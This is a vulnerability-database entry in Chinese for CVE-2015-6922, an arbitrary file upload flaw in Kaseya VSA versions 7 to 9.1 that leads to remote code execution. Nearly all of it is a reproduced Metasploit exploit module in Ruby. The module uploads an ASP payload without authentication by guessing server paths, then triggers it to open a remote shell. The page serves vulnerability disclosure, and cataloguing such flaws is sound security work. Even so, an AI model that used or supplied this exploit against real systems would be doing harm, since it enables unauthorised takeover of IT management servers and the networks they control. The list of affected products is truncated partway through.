Kaseya Virtual System Administrator 提权漏洞和远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123059 漏洞类型 Input Validation Error
发布时间 2015-10-05 更新时间 2015-10-05
CVE编号 CVE-2015-6922 CNNVD-ID CNNVD-201509-505
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/38401
https://www.securityfocus.com/bid/76835
https://cxsecurity.com/issue/WLB-2015100048
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201509-505
|漏洞详情
KaseyaVirtualSystemAdministrator(VSA)是瑞士卡西亚(Kaseya)公司的一套用于简化和自动化IT服务的IT系统管理平台。KaseyaVSA中存在提权漏洞和远程代码执行漏洞,这些漏洞源于程序没有对用户强制执行身份验证并且没有限制目标文件路径。攻击者可利用这些漏洞获取‘MasterAdmin’权限,在服务器中上传并执行任意代码。
|漏洞EXP
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload',
      'Description' => %q{
        This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions
        between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary
        directory leading to arbitrary code execution with IUSR privileges. This module has been
        tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
      },
      'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2015-6922'],
          ['ZDI', '15-449'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],
          ['URL', 'http://seclists.org/bugtraq/2015/Sep/132']
        ],
      'Platform' => 'win',
      'Arch' => ARCH_X86,
      'Privileged' => false,
      'Targets' =>
        [
          [ 'Kaseya VSA v7 to v9.1', {} ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 23 2015'))
  end


  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('ConfigTab','uploader.aspx')
    })

    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end


  def upload_file(payload, path, filename, session_id)
    print_status("#{peer} - Uploading payload to #{path}...")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
      'vars_get' => {
        'PathData' => path,
        'qqfile' => filename
      },
      'data' => payload,
      'ctype' => 'application/octet-stream',
      'cookie' => 'sessionId=' + session_id
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"')
      return true
    else
      return false
    end
  end


  def exploit
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('ConfigTab','uploader.aspx')
    })

    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
      session_id = $1
    else
      fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session")
    end

    asp_name = "#{rand_text_alpha_lower(8)}.asp"
    exe = generate_payload_exe
    payload = Msf::Util::EXE.to_exe_asp(exe).to_s

    paths = [
      # We have to guess the path, so just try the most common directories
      'C:\\Kaseya\\WebPages\\',
      'C:\\Program Files\\Kaseya\\WebPages\\',
      'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
      'D:\\Kaseya\\WebPages\\',
      'D:\\Program Files\\Kaseya\\WebPages\\',
      'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
      'E:\\Kaseya\\WebPages\\',
      'E:\\Program Files\\Kaseya\\WebPages\\',
      'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
    ]

    paths.each do |path|
      if upload_file(payload, path, asp_name, session_id)
        register_files_for_cleanup(path + asp_name)
        print_status("#{peer} - Executing payload #{asp_name}")

        send_request_cgi({
          'uri' => normalize_uri(asp_name),
          'method' => 'GET'
        })

        # Failure. The request timed out or the server went away.
        break if res.nil?
        # Success! Triggered the payload, should have a shell incoming
        break if res.code == 200
      end
    end

  end
end
|受影响的产品
Kaseya Virtual System Administrator 9.1.0.8 Kaseya Virtual System Administrator 9.1.0.7 Kaseya Virtual System Administrator 9.1.0.6 Kaseya Virtual System Administrator 9.1.0.5 Kaseya Virt
|参考资料

来源:www.zerodayinitiative.com连接:http://www.zerodayinitiative.com/advisories/ZDI-15-448